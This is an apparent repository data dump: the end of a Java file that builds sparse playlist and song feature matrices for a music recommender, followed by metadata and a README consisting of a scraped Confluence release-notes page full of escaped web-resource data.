};\n\n\t\t\tMLTextTransform[] textTransforms;\n\t\t\tswitch (featureName) {\n\t\t\t\tcase NAME_TOKENIZED: {\n\t\t\t\t\t// tokenize playlist name\n\t\t\t\t\ttextTransforms = new MLTextTransform[] {\n\t\t\t\t\t\t\tnew MLTextTransform.LuceneAnalyzerTextTransform(\n\t\t\t\t\t\t\t\t\tnew MLTextTransform.DefaultAnalyzer()) };\n\t\t\t\t\tbreak;\n\t\t\t\t}\n\t\t\t\tdefault: {\n\t\t\t\t\ttextTransforms = null;\n\t\t\t\t\tbreak;\n\t\t\t\t}\n\t\t\t}\n\n\t\t\tMLSparseFeature feature = new MLSparseFeature(nPlaylists,\n\t\t\t\t\ttextTransforms, featTransforms, MLSparseMatrixAOO.class);\n\t\t\tthis.dataParsed.playlistFeatures.put(featureName, feature);\n\t\t}\n\t\ttimer.toc(\"init done\");\n\n\t\t// load playlists\n\n\t\tAtomicInteger count = new AtomicInteger(0);\n\t\tthis.dataParsed.testIndexes = this.dataLoaded.testIndexes;\n\t\tthis.dataParsed.playlistIds = new String[nPlaylists];\n\t\t// IntStream.range(0, nPlaylists).parallel()(i -> {\n\t\tfor (int i = 0; i < nPlaylists; i++) {\n\t\t\tPlaylist playlist = this.dataLoaded.playlists[i];\n\t\t\tthis.dataParsed.playlistIds[i] = playlist.get_pid();\n\n\t\t\tTrack[] tracks = playlist.getTracks();\n\n\t\t\t// convert playlist to sparse matrix\n\t\t\tif (tracks != null && tracks.length > 0) {\n\t\t\t\tMap<Integer, MLMatrixElement> elementMap = new HashMap<Integer, MLMatrixElement>();\n\t\t\t\tfor (int j = 0; j < tracks.length; j++) {\n\t\t\t\t\tMLMatrixElement element = elementMap\n\t\t\t\t\t\t\t.get(tracks[j].getSongIndex());\n\t\t\t\t\tif (element == null) {\n\t\t\t\t\t\t// set date to position in the playlist\n\t\t\t\t\t\telement = new MLMatrixElement(i,\n\t\t\t\t\t\t\t\ttracks[j].getSongIndex(), 1.0f,\n\t\t\t\t\t\t\t\ttracks[j].getSongPos());\n\t\t\t\t\t\telementMap.put(tracks[j].getSongIndex(), element);\n\t\t\t\t\t} else {\n\t\t\t\t\t\t// some playlists have duplicate songs\n\t\t\t\t\t\telement.setValue(element.getValue() + 1.0f);\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\tMLMatrixElement[] elements = new MLMatrixElement[elementMap\n\t\t\t\t\t\t.size()];\n\t\t\t\tint curIndex = 0;\n\t\t\t\tfor (MLMatrixElement element : elementMap.values()) {\n\t\t\t\t\telements[curIndex] = element;\n\t\t\t\t\tcurIndex++;\n\t\t\t\t}\n\t\t\t\tArrays.sort(elements,\n\t\t\t\t\t\tnew MLMatrixElement.ColIndexComparator(false));\n\n\t\t\t\tint[] indexes = new int[elements.length];\n\t\t\t\tfloat[] values = new float[elements.length];\n\t\t\t\tlong[] dates = new long[elements.length];\n\t\t\t\tfor (int j = 0; j < elements.length; j++) {\n\t\t\t\t\tindexes[j] = elements[j].getColIndex();\n\t\t\t\t\tvalues[j] = elements[j].getValue();\n\t\t\t\t\tdates[j] = elements[j].getDate();\n\t\t\t\t}\n\t\t\t\trows[i] = new MLSparseVector(indexes, values, dates, nSongs);\n\t\t\t}\n\n\t\t\t// add playlist features\n\t\t\tfor (PlaylistFeature featureName : PlaylistFeature.values()) {\n\t\t\t\tswitch (featureName) {\n\t\t\t\t\tcase NAME_ORIGINAL: {\n\t\t\t\t\t\tif (playlist.get_name() != null) {\n\t\t\t\t\t\t\tthis.dataParsed.playlistFeatures.get(featureName)\n\t\t\t\t\t\t\t\t\t.addRow(i, playlist.get_name());\n\t\t\t\t\t\t}\n\t\t\t\t\t\tbreak;\n\t\t\t\t\t}\n\n\t\t\t\t\tcase NAME_REGEXED: {\n\t\t\t\t\t\tif (playlist.get_name() != null) {\n\t\t\t\t\t\t\tString name = playlist.get_name();\n\t\t\t\t\t\t\tname = name.toLowerCase();\n\t\t\t\t\t\t\tname = name.replaceAll(\"\\\\p{Punct}\", \" \");\n\t\t\t\t\t\t\tname = name.replaceAll(\"\\\\s+\", \" \").trim();\n\t\t\t\t\t\t\tthis.dataParsed.playlistFeatures.get(featureName)\n\t\t\t\t\t\t\t\t\t.addRow(i, name);\n\t\t\t\t\t\t}\n\t\t\t\t\t\tbreak;\n\t\t\t\t\t}\n\n\t\t\t\t\tcase NAME_TOKENIZED: {\n\t\t\t\t\t\tif (playlist.get_name() != null) {\n\t\t\t\t\t\t\t// convert emojis to string\n\t\t\t\t\t\t\tString name = playlist.get_name();\n\t\t\t\t\t\t\tthis.dataParsed.playlistFeatures.get(featureName)\n\t\t\t\t\t\t\t\t\t.addRow(i, name);\n\t\t\t\t\t\t}\n\t\t\t\t\t\tbreak;\n\t\t\t\t\t}\n\n\t\t\t\t\tcase N_TRACKS: {\n\t\t\t\t\t\tif (playlist.get_num_tracks() != null) {\n\t\t\t\t\t\t\tthis.dataParsed.playlistFeatures.get(featureName)\n\t\t\t\t\t\t\t\t\t.addRow(i, new MLSparseVector(\n\t\t\t\t\t\t\t\t\t\t\tnew int[] { 0 },\n\t\t\t\t\t\t\t\t\t\t\tnew float[] {\n\t\t\t\t\t\t\t\t\t\t\t\t\tplaylist.get_num_tracks() },\n\t\t\t\t\t\t\t\t\t\t\tnull, 1));\n\t\t\t\t\t\t}\n\t\t\t\t\t\tbreak;\n\t\t\t\t\t}\n\n\t\t\t\t\t// case IS_COLLABORATIVE: {\n\t\t\t\t\t// int collab = 0;\n\t\t\t\t\t// if (playlist.get_collaborative() == true) {\n\t\t\t\t\t// collab = 1;\n\t\t\t\t\t// }\n\t\t\t\t\t// this.dataParsed.playlistFeatures.get(featureName)\n\t\t\t\t\t// .addRow(i, new MLSparseVector(new int[] { 0 },\n\t\t\t\t\t// new float[] { collab }, null, 1));\n\t\t\t\t\t// break;\n\t\t\t\t\t// }\n\t\t\t\t\t//\n\t\t\t\t\t// case MODIFIED_AT: {\n\t\t\t\t\t// this.dataParsed.playlistFeatures.get(featureName)\n\t\t\t\t\t// .addRow(i, new MLSparseVector(new int[] { 0 },\n\t\t\t\t\t// new float[] { TimeUnit.MILLISECONDS\n\t\t\t\t\t// .toHours(playlist\n\t\t\t\t\t// .get_modified_at()) },\n\t\t\t\t\t// null, 1));\n\t\t\t\t\t// break;\n\t\t\t\t\t// }\n\t\t\t\t\t//\n\t\t\t\t\t// case N_FOLLOWERS: {\n\t\t\t\t\t// this.dataParsed.playlistFeatures.get(featureName)\n\t\t\t\t\t// .addRow(i, new MLSparseVector(new int[] { 0 },\n\t\t\t\t\t// new float[] {\n\t\t\t\t\t// playlist.get_num_followers() },\n\t\t\t\t\t// null, 1));\n\t\t\t\t\t// break;\n\t\t\t\t\t// }\n\t\t\t\t\t//\n\t\t\t\t\t// case N_EDITS: {\n\t\t\t\t\t// this.dataParsed.playlistFeatures.get(featureName)\n\t\t\t\t\t// .addRow(i, new MLSparseVector(new int[] { 0 },\n\t\t\t\t\t// new float[] {\n\t\t\t\t\t// playlist.get_num_edits() },\n\t\t\t\t\t// null, 1));\n\t\t\t\t\t// break;\n\t\t\t\t\t// }\n\t\t\t\t}\n\t\t\t}\n\n\t\t\tint curCount = count.incrementAndGet();\n\t\t\tif (curCount % 100_000 == 0) {\n\t\t\t\ttimer.tocLoop(curCount);\n\t\t\t}\n\t\t\t// });\n\t\t}\n\t\ttimer.tocLoop(count.get());\n\n\t\tfor (PlaylistFeature featureName : PlaylistFeature.values()) {\n\t\t\t// finalize feature, apply transforms but preserve original data\n\t\t\tthis.dataParsed.playlistFeatures.get(featureName)\n\t\t\t\t\t.finalizeFeature(true);\n\t\t}\n\t}\n\n\tpublic void loadSongs() {\n\t\tMLTimer timer = new MLTimer(\"loadSongs\");\n\t\ttimer.tic();\n\t\tint nSongs = this.dataLoaded.songs.length;\n\n\t\t// init song feature matrices\n\t\tthis.dataParsed.songFeatures = new HashMap<SongFeature, MLSparseFeature>();\n\t\tfor (SongFeature featureName : SongFeature.values()) {\n\t\t\tMLFeatureTransform[] featTransforms = new MLFeatureTransform[] {\n\t\t\t\t\tnew MLFeatureTransform.ColSelectorTransform(1_000) };\n\n\t\t\tMLTextTransform[] textTransforms;\n\t\t\tswitch (featureName) {\n\t\t\t\tcase TRACK_NAME: {\n\t\t\t\t\t// tokenize song name\n\t\t\t\t\ttextTransforms = new MLTextTransform[] {\n\t\t\t\t\t\t\tnew MLTextTransform.LuceneAnalyzerTextTransform(\n\t\t\t\t\t\t\t\t\tnew MLTextTransform.DefaultAnalyzer()) };\n\t\t\t\t\tbreak;\n\t\t\t\t}\n\t\t\t\tdefault: {\n\t\t\t\t\ttextTransforms = null;\n\t\t\t\t\tbreak;\n\t\t\t\t}\n\t\t\t}\n\n\t\t\tMLSparseFeature feature = new MLSparseFeature(nSongs,\n\t\t\t\t\ttextTransforms, featTransforms, MLSparseMatrixAOO.class);\n\t\t\tthis.dataParsed.songFeatures.put(featureName, feature);\n\t\t}\n\n\t\tAtomicInteger count = new AtomicInteger(0);\n\t\tthis.dataParsed.songIds = new String[nSongs];\n\t\t// IntStream.range(0, nSongs).parallel()(i -> {\n\t\tfor (int i = 0; i < nSongs; i++) {\n\t\t\tSong song = this.dataLoaded.songs[i];\n\t\t\tthis.dataParsed.songIds[i] = song.get_track_uri();\n\n\t\t\t// add song features\n\t\t\tfor (SongFeature featureName : SongFeature.values()) {\n\t\t\t\tswitch (featureName) {\n\t\t\t\t\tcase ARTIST_ID: {\n\t\t\t\t\t\tthis.dataParsed.songFeatures.get(featureName).addRow(i,\n\t\t\t\t\t\t\t\tnew String[] { song.get_artist_uri() });\n\t\t\t\t\t\tbreak;\n\t\t\t\t\t}\n\n\t\t\t\t\tcase ALBUM_ID: {\n\t\t\t\t\t\tthis.dataParsed.songFeatures.get(featureName).addRow(i,\n\t\t\t\t\t\t\t\tnew String[] { song.get_album_uri() });\n\t\t\t\t\t\tbreak;\n\t\t\t\t\t}\n\n\t\t\t\t\tcase TRACK_NAME: {\n\t\t\t\t\t\tthis.dataParsed.songFeatures.get(featureName).addRow(i,\n\t\t\t\t\t\t\t\tsong.get_track_name());\n\t\t\t\t\t\tbreak;\n\t\t\t\t\t}\n\n\t\t\t\t\tcase DURATION: {\n\t\t\t\t\t\tthis.dataParsed.songFeatures.get(featureName).addRow(i,\n\t\t\t\t\t\t\t\tnew MLSparseVector(new int[] { 0 },\n\t\t\t\t\t\t\t\t\t\tnew float[] { TimeUnit.MILLISECONDS\n\t\t\t\t\t\t\t\t\t\t\t\t.toSeconds(song\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t.get_duration_ms()) },\n\t\t\t\t\t\t\t\t\t\tnull, 1));\n\t\t\t\t\t\tbreak;\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\n\t\t\tint cur = count.incrementAndGet();\n\t\t\tif (cur % 100_000 == 0) {\n\t\t\t\ttimer.tocLoop(cur);\n\t\t\t}\n\t\t}\n\t\t// });\n\t\ttimer.tocLoop(count.get());\n\n\t\tfor (SongFeature featureName : SongFeature.values()) {\n\t\t\t// finalize feature, apply transforms but preserve original data\n\t\t\tthis.dataParsed.songFeatures.get(featureName).finalizeFeature(true);\n\t\t}\n\n\t}\n\n\tpublic void loadSongExtraInfo(final String inFile) throws Exception {\n\t\tMLTimer timer = new MLTimer(\"loadSongExtraInfo\");\n\t\ttimer.tic();\n\n\t\tMap<String, Integer> songToIndexMap = new HashMap<String, Integer>();\n\t\tfor (int i = 0; i < this.dataParsed.songIds.length; i++) {\n\t\t\tsongToIndexMap.put(this.dataParsed.songIds[i], i);\n\t\t}\n\n\t\tthis.dataParsed.songExtraInfoFeatures = new HashMap<SongExtraInfoFeature, MLSparseFeature>();\n\t\tfor (SongExtraInfoFeature featureName : SongExtraInfoFeature.values()) {\n\t\t\tMLFeatureTransform[] featTransforms = new MLFeatureTransform[] {\n\t\t\t\t\tnew MLFeatureTransform.ColSelectorTransform(1_000) };\n\n\t\t\tMLSparseFeature feature = new MLSparseFeature(\n\t\t\t\t\tthis.dataParsed.songIds.length, null, featTransforms,\n\t\t\t\t\tMLSparseMatrixAOO.class);\n\t\t\tthis.dataParsed.songExtraInfoFeatures.put(featureName, feature);\n\t\t}\n\n\t\tJSONParser parser = new JSONParser(JSONParser.USE_INTEGER_STORAGE);\n\t\tAtomicInteger count = new AtomicInteger(0);\n\t\ttry (BufferedReader reader = new BufferedReader(\n\t\t\t\tnew FileReader(inFile))) {\n\t\t\tJSONArray parsed = (JSONArray) parser.parse(reader);\n\t\t\tfor (Object element : parsed) {\n\t\t\t\tif (element == null\n\t\t\t\t\t\t|| ((JSONObject) element).containsKey(\"uri\") == false) {\n\t\t\t\t\tcontinue;\n\t\t\t\t}\n\n\t\t\t\tString songId = ((JSONObject) element).getAsString(\"uri\");\n\t\t\t\tint songIndex = songToIndexMap.get(songId);\n\n\t\t\t\tint cur = count.incrementAndGet();\n\t\t\t\tif (cur % 100_000 == 0) {\n\t\t\t\t\ttimer.tocLoop(cur);\n\t\t\t\t}\n\n\t\t\t\tfor (SongExtraInfoFeature feature : SongExtraInfoFeature\n\t\t\t\t\t\t.values()) {\n\t\t\t\t\tif (((JSONObject) element)\n\t\t\t\t\t\t\t.containsKey(feature.name()) == false\n\t\t\t\t\t\t\t|| ((JSONObject) element)\n\t\t\t\t\t\t\t\t\t.get(feature.name()) == null) {\n\t\t\t\t\t\tcontinue;\n\t\t\t\t\t}\n\n\t\t\t\t\tif (feature.equals(SongExtraInfoFeature.key) == true) {\n\t\t\t\t\t\tthis.dataParsed.songExtraInfoFeatures.get(feature)\n\t\t\t\t\t\t\t\t.addRow(songIndex,\n\t\t\t\t\t\t\t\t\t\t((JSONObject) element)\n\t\t\t\t\t\t\t\t\t\t\t\t.getAsNumber(feature.name())\n\t\t\t\t\t\t\t\t\t\t\t\t.intValue() + \"\");\n\n\t\t\t\t\t} else {\n\t\t\t\t\t\tfloat value = ((JSONObject) element)\n\t\t\t\t\t\t\t\t.getAsNumber(feature.name()).floatValue();\n\t\t\t\t\t\tthis.dataParsed.songExtraInfoFeatures.get(feature)\n\t\t\t\t\t\t\t\t.addRow(songIndex,\n\t\t\t\t\t\t\t\t\t\tnew MLSparseVector(new int[] { 0 },\n\t\t\t\t\t\t\t\t\t\t\t\tnew float[] { value }, null,\n\t\t\t\t\t\t\t\t\t\t\t\t1));\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\ttimer.tocLoop(count.get());\n\n\t\tfor (SongExtraInfoFeature featureName : SongExtraInfoFeature.values()) {\n\t\t\t// finalize feature, apply transforms but preserve original data\n\t\t\tthis.dataParsed.songExtraInfoFeatures.get(featureName)\n\t\t\t\t\t.finalizeFeature(true);\n\t\t}\n\t}\n\n}\n" } ]
14
ShubhamGoel/test
https://github.com/ShubhamGoel/test
fe237fc8d5ef743f7716ba33a39bc57d31bec36e
912c2aea4040b1dd96d5ad73d93efff5755b6fcc
3df7c6a47f521fb48562ecd2a6609cb06aad41fa
refs/heads/master
2020-12-04T07:28:22.184061
2020-07-30T05:43:49
2020-07-30T05:43:49
231,677,625
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6545789837837219, "alphanum_fraction": 0.7680014967918396, "avg_line_length": 112.71505737304688, "blob_id": "ead74d58d01fef015e79a73d9a399cdd6428171f", "content_id": "f61c64a163dee3a74c6de1876388fcdf83c510c5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 21161, "license_type": "no_license", "max_line_length": 12361, "num_lines": 186, "path": "/README.md", "repo_name": "ShubhamGoel/test", "src_encoding": "UTF-8", "text": "Cumulus 5.3.0- Release Notes - Roche Sequencing Solutions - Roche Wiki var contextPath = '/confluence'; .ia-fixed-sidebar, .ia-splitter-left {width: 285px;}.theme-default .ia-splitter #main {margin-left: 285px;}.ia-fixed-sidebar {visibility: hidden;} window.WRM=window.WRM||{};window.WRM.\\_unparsedData=window.WRM.\\_unparsedData||{};window.WRM.\\_unparsedErrors=window.WRM.\\_unparsedErrors||{}; WRM.\\_unparsedData\\[\"com.atlassian.plugins.atlassian-plugins-webresource-plugin:context-path.context-path\"\\]=\"\\\\u0022\\\\u005C/confluence\\\\u0022\"; WRM.\\_unparsedData\\[\"com.atlassian.confluence.plugins.confluence-hipchat-integration-plugin:discovery-javascript-data.link-active\"\\]=\"{\\\\u0022linkActive\\\\u0022:false,\\\\u0022conditionsMet\\\\u0022:false,\\\\u0022admin\\\\u0022:false}\"; WRM.\\_unparsedData\\[\"com.atlassian.confluence.plugins.confluence-feature-discovery-plugin:confluence-feature-discovery-plugin-resources.test-mode\"\\]=\"false\"; WRM.\\_unparsedData\\[\"com.atlassian.analytics.analytics-client:policy-update-init.policy-update-data-provider\"\\]=\"false\"; WRM.\\_unparsedData\\[\"com.atlassian.analytics.analytics-client:programmatic-analytics-init.programmatic-analytics-data-provider\"\\]=\"false\"; WRM.\\_unparsedData\\[\"com.atlassian.applinks.applinks-plugin:applinks-common-exported.applinks-help-paths\"\\]=\"{\\\\u0022entries\\\\u0022:{\\\\u0022applinks.docs.root\\\\u0022:\\\\u0022https://confluence.atlassian.com/display/APPLINKS-054/\\\\u0022,\\\\u0022applinks.docs.diagnostics.troubleshoot.sslunmatched\\\\u0022:\\\\u0022SSL+and+application+link+troubleshooting+guide\\\\u0022,\\\\u0022applinks.docs.diagnostics.troubleshoot.oauthsignatureinvalid\\\\u0022:\\\\u0022OAuth+troubleshooting+guide\\\\u0022,\\\\u0022applinks.docs.diagnostics.troubleshoot.oauthtimestamprefused\\\\u0022:\\\\u0022OAuth+troubleshooting+guide\\\\u0022,\\\\u0022applinks.docs.delete.entity.link\\\\u0022:\\\\u0022Create+links+between+projects\\\\u0022,\\\\u0022applinks.docs.adding.application.link\\\\u0022:\\\\u0022Link+Atlassian+applications+to+work+together\\\\u0022,\\\\u0022applinks.docs.administration.guide\\\\u0022:\\\\u0022Application+Links+Documentation\\\\u0022,\\\\u0022applinks.docs.oauth.security\\\\u0022:\\\\u0022OAuth+security+for+application+links\\\\u0022,\\\\u0022applinks.docs.troubleshoot.application.links\\\\u0022:\\\\u0022Troubleshoot+application+links\\\\u0022,\\\\u0022applinks.docs.diagnostics.troubleshoot.unknownerror\\\\u0022:\\\\u0022Network+and+connectivity+troubleshooting+guide\\\\u0022,\\\\u0022applinks.docs.configuring.auth.trusted.apps\\\\u0022:\\\\u0022Configuring+Trusted+Applications+authentication+for+an+application+link\\\\u0022,\\\\u0022applinks.docs.diagnostics.troubleshoot.authlevelunsupported\\\\u0022:\\\\u0022OAuth+troubleshooting+guide\\\\u0022,\\\\u0022applinks.docs.diagnostics.troubleshoot.ssluntrusted\\\\u0022:\\\\u0022SSL+and+application+link+troubleshooting+guide\\\\u0022,\\\\u0022applinks.docs.diagnostics.troubleshoot.unknownhost\\\\u0022:\\\\u0022Network+and+connectivity+troubleshooting+guide\\\\u0022,\\\\u0022applinks.docs.delete.application.link\\\\u0022:\\\\u0022Link+Atlassian+applications+to+work+together\\\\u0022,\\\\u0022applinks.docs.link.applications\\\\u0022:\\\\u0022Link+Atlassian+applications+to+work+together\\\\u0022,\\\\u0022applinks.docs.diagnostics.troubleshoot.oauthproblem\\\\u0022:\\\\u0022OAuth+troubleshooting+guide\\\\u0022,\\\\u0022applinks.docs.diagnostics.troubleshoot.migration\\\\u0022:\\\\u0022Update+application+links+to+use+OAuth\\\\u0022,\\\\u0022applinks.docs.relocate.application.link\\\\u0022:\\\\u0022Link+Atlassian+applications+to+work+together\\\\u0022,\\\\u0022applinks.docs.administering.entity.links\\\\u0022:\\\\u0022Create+links+between+projects\\\\u0022,\\\\u0022applinks.docs.upgrade.application.link\\\\u0022:\\\\u0022OAuth+security+for+application+links\\\\u0022,\\\\u0022applinks.docs.diagnostics.troubleshoot.connectionrefused\\\\u0022:\\\\u0022Network+and+connectivity+troubleshooting+guide\\\\u0022,\\\\u0022applinks.docs.configuring.auth.oauth\\\\u0022:\\\\u0022OAuth+security+for+application+links\\\\u0022,\\\\u0022applinks.docs.insufficient.remote.permission\\\\u0022:\\\\u0022OAuth+security+for+application+links\\\\u0022,\\\\u0022applinks.docs.configuring.application.link.auth\\\\u0022:\\\\u0022OAuth+security+for+application+links\\\\u0022,\\\\u0022applinks.docs.diagnostics\\\\u0022:\\\\u0022Application+links+diagnostics\\\\u0022,\\\\u0022applinks.docs.configured.authentication.types\\\\u0022:\\\\u0022OAuth+security+for+application+links\\\\u0022,\\\\u0022applinks.docs.adding.entity.link\\\\u0022:\\\\u0022Create+links+between+projects\\\\u0022,\\\\u0022applinks.docs.diagnostics.troubleshoot.unexpectedresponse\\\\u0022:\\\\u0022Network+and+connectivity+troubleshooting+guide\\\\u0022,\\\\u0022applinks.docs.configuring.auth.basic\\\\u0022:\\\\u0022Configuring+Basic+HTTP+Authentication+for+an+Application+Link\\\\u0022,\\\\u0022applinks.docs.diagnostics.troubleshoot.authlevelmismatch\\\\u0022:\\\\u0022OAuth+troubleshooting+guide\\\\u0022}}\"; WRM.\\_unparsedData\\[\"com.atlassian.applinks.applinks-plugin:applinks-common-exported.applinks-types\"\\]=\"{\\\\u0022crowd\\\\u0022:\\\\u0022Crowd\\\\u0022,\\\\u0022confluence\\\\u0022:\\\\u0022Confluence\\\\u0022,\\\\u0022fecru\\\\u0022:\\\\u0022FishEye / Crucible\\\\u0022,\\\\u0022stash\\\\u0022:\\\\u0022Bitbucket Server\\\\u0022,\\\\u0022jira\\\\u0022:\\\\u0022Jira\\\\u0022,\\\\u0022refapp\\\\u0022:\\\\u0022Reference Application\\\\u0022,\\\\u0022bamboo\\\\u0022:\\\\u0022Bamboo\\\\u0022,\\\\u0022generic\\\\u0022:\\\\u0022Generic Application\\\\u0022}\"; WRM.\\_unparsedData\\[\"com.atlassian.applinks.applinks-plugin:applinks-common-exported.entity-types\"\\]=\"{\\\\u0022singular\\\\u0022:{\\\\u0022refapp.charlie\\\\u0022:\\\\u0022Charlie\\\\u0022,\\\\u0022fecru.project\\\\u0022:\\\\u0022Crucible Project\\\\u0022,\\\\u0022fecru.repository\\\\u0022:\\\\u0022FishEye Repository\\\\u0022,\\\\u0022stash.project\\\\u0022:\\\\u0022Bitbucket Server Project\\\\u0022,\\\\u0022generic.entity\\\\u0022:\\\\u0022Generic Project\\\\u0022,\\\\u0022confluence.space\\\\u0022:\\\\u0022Confluence Space\\\\u0022,\\\\u0022bamboo.project\\\\u0022:\\\\u0022Bamboo Project\\\\u0022,\\\\u0022jira.project\\\\u0022:\\\\u0022Jira Project\\\\u0022},\\\\u0022plural\\\\u0022:{\\\\u0022refapp.charlie\\\\u0022:\\\\u0022Charlies\\\\u0022,\\\\u0022fecru.project\\\\u0022:\\\\u0022Crucible Projects\\\\u0022,\\\\u0022fecru.repository\\\\u0022:\\\\u0022FishEye Repositories\\\\u0022,\\\\u0022stash.project\\\\u0022:\\\\u0022Bitbucket Server Projects\\\\u0022,\\\\u0022generic.entity\\\\u0022:\\\\u0022Generic Projects\\\\u0022,\\\\u0022confluence.space\\\\u0022:\\\\u0022Confluence Spaces\\\\u0022,\\\\u0022bamboo.project\\\\u0022:\\\\u0022Bamboo Projects\\\\u0022,\\\\u0022jira.project\\\\u0022:\\\\u0022Jira Projects\\\\u0022}}\"; WRM.\\_unparsedData\\[\"com.atlassian.applinks.applinks-plugin:applinks-common-exported.authentication-types\"\\]=\"{\\\\u0022com.atlassian.applinks.api.auth.types.BasicAuthenticationProvider\\\\u0022:\\\\u0022Basic Access\\\\u0022,\\\\u0022com.atlassian.applinks.api.auth.types.TrustedAppsAuthenticationProvider\\\\u0022:\\\\u0022Trusted Applications\\\\u0022,\\\\u0022com.atlassian.applinks.api.auth.types.CorsAuthenticationProvider\\\\u0022:\\\\u0022CORS\\\\u0022,\\\\u0022com.atlassian.applinks.api.auth.types.OAuthAuthenticationProvider\\\\u0022:\\\\u0022OAuth\\\\u0022,\\\\u0022com.atlassian.applinks.api.auth.types.TwoLeggedOAuthAuthenticationProvider\\\\u0022:\\\\u0022OAuth\\\\u0022,\\\\u0022com.atlassian.applinks.api.auth.types.TwoLeggedOAuthWithImpersonationAuthenticationProvider\\\\u0022:\\\\u0022OAuth\\\\u0022}\"; WRM.\\_unparsedData\\[\"com.atlassian.confluence.plugins.synchrony-interop:synchrony-status-banner-loader.synchrony-status\"\\]=\"false\"; WRM.\\_unparsedData\\[\"com.atlassian.confluence.plugins.confluence-license-banner:confluence-license-banner-resources.license-details\"\\]=\"{\\\\u0022daysBeforeLicenseExpiry\\\\u0022:0,\\\\u0022daysBeforeMaintenanceExpiry\\\\u0022:0,\\\\u0022showLicenseExpiryBanner\\\\u0022:false,\\\\u0022showMaintenanceExpiryBanner\\\\u0022:false,\\\\u0022renewUrl\\\\u0022:null,\\\\u0022salesEmail\\\\u0022:null}\"; WRM.\\_unparsedData\\[\"com.atlassian.confluence.plugins.confluence-search-ui-plugin:confluence-search-ui-plugin-resources.i18n-data\"\\]=\"{\\\\u0022search.ui.recent.link.text\\\\u0022:\\\\u0022View more recently visited\\\\u0022,\\\\u0022search.ui.filter.space.category.input.label\\\\u0022:\\\\u0022Find space categories...\\\\u0022,\\\\u0022search.ui.filter.clear.selected\\\\u0022:\\\\u0022Clear selected items\\\\u0022,\\\\u0022search.ui.search.results.empty\\\\u0022:\\\\u0022We couldn\\\\u005Cu0027\\\\u005Cu0027t find anything matching \\\\u005C\\\\u0022{0}\\\\u005C\\\\u0022.\\\\u0022,\\\\u0022search.ui.content.name.search.items.panel.load.all.top.items.button.text\\\\u0022:\\\\u0022Show more app results...\\\\u0022,\\\\u0022search.ui.filter.space.archive.label\\\\u0022:\\\\u0022Search archived spaces\\\\u0022,\\\\u0022search.ui.filter.label\\\\u0022:\\\\u0022filter\\\\u0022,\\\\u0022search.ui.filter.contributor.button.text\\\\u0022:\\\\u0022Contributor\\\\u0022,\\\\u0022search.ui.filter.date.all.text\\\\u0022:\\\\u0022Any time\\\\u0022,\\\\u0022search.ui.filter.space.current.label\\\\u0022:\\\\u0022CURRENT\\\\u0022,\\\\u0022search.ui.clear.input.button.text\\\\u0022:\\\\u0022Clear text\\\\u0022,\\\\u0022help.search.ui.link.title\\\\u0022:\\\\u0022Search tips\\\\u0022,\\\\u0022search.ui.search.results.clear.button\\\\u0022:\\\\u0022clear your filters.\\\\u0022,\\\\u0022search.ui.filter.date.hour.text\\\\u0022:\\\\u0022The past day\\\\u0022,\\\\u0022search.ui.filters.heading\\\\u0022:\\\\u0022Filter by\\\\u0022,\\\\u0022search.ui.filter.label.input.label\\\\u0022:\\\\u0022Find labels...\\\\u0022,\\\\u0022search.ui.filter.date.month.text\\\\u0022:\\\\u0022The past month\\\\u0022,\\\\u0022search.ui.recent.items.anonymous\\\\u0022:\\\\u0022Start exploring. Your search results will appear here.\\\\u0022,\\\\u0022search.ui.input.label\\\\u0022:\\\\u0022Search\\\\u0022,\\\\u0022search.ui.search.result\\\\u0022:\\\\u0022{0,choice,1#{0} search result|1\\\\u005Cu003c{0} search results}\\\\u0022,\\\\u0022search.ui.infinite.scroll.button.text\\\\u0022:\\\\u0022More results\\\\u0022,\\\\u0022search.ui.filter.date.button.text\\\\u0022:\\\\u0022Date\\\\u0022,\\\\u0022search.ui.filter.date.week.text\\\\u0022:\\\\u0022The past week\\\\u0022,\\\\u0022search.ui.filter.label.button.text\\\\u0022:\\\\u0022Label\\\\u0022,\\\\u0022search.ui.input.alert\\\\u0022:\\\\u0022Hit enter to search\\\\u0022,\\\\u0022search.ui.filter.no.result.text\\\\u0022:\\\\u0022We can\\\\u005Cu0027\\\\u005Cu0027t find anything matching your search\\\\u0022,\\\\u0022search.ui.result.subtitle.calendar\\\\u0022:\\\\u0022Team calendar\\\\u0022,\\\\u0022search.ui.filter.date.heading\\\\u0022:\\\\u0022Last modified within\\\\u0022,\\\\u0022search.ui.result.subtitle.user\\\\u0022:\\\\u0022User profile\\\\u0022,\\\\u0022search.ui.filter.contributor.input.label\\\\u0022:\\\\u0022Find people...\\\\u0022,\\\\u0022search.ui.filter.content.type.button.text\\\\u0022:\\\\u0022Type\\\\u0022,\\\\u0022search.ui.filter.space.input.label\\\\u0022:\\\\u0022Find spaces...\\\\u0022,\\\\u0022search.ui.filter.date.year.text\\\\u0022:\\\\u0022The past year\\\\u0022,\\\\u0022search.ui.filter.space.button.text\\\\u0022:\\\\u0022Space\\\\u0022,\\\\u0022search.ui.advanced.search.link.text\\\\u0022:\\\\u0022Advanced search\\\\u0022,\\\\u0022search.ui.generic.error\\\\u0022:\\\\u0022Something went wrong. Refresh the page, or contact your admin if this keeps happening.\\\\u0022,\\\\u0022search.ui.recent.spaces\\\\u0022:\\\\u0022Recent Spaces\\\\u0022,\\\\u0022search.ui.search.results.clear.line2\\\\u0022:\\\\u0022Try a different search term or\\\\u0022,\\\\u0022search.ui.filter.space.category.button.text\\\\u0022:\\\\u0022Space category\\\\u0022,\\\\u0022search.ui.search.results.clear.line1\\\\u0022:\\\\u0022We couldn\\\\u005Cu0027\\\\u005Cu0027t find anything matching your search.\\\\u0022,\\\\u0022search.ui.content.name.search.items.panel.load.all.top.items.admin.button.text\\\\u0022:\\\\u0022Show more settings and app results...\\\\u0022,\\\\u0022search.ui.recent.pages\\\\u0022:\\\\u0022Recently visited\\\\u0022,\\\\u0022search.ui.search.result.anonymous\\\\u0022:\\\\u0022{0,choice,1#{0} search result|1\\\\u005Cu003c{0} search results}. Have an account? {1}Log in{2} to expand your search.\\\\u0022,\\\\u0022search.ui.recent.items.empty\\\\u0022:\\\\u0022Start exploring. Pages and spaces you\\\\u005Cu0027\\\\u005Cu0027ve visited recently will appear 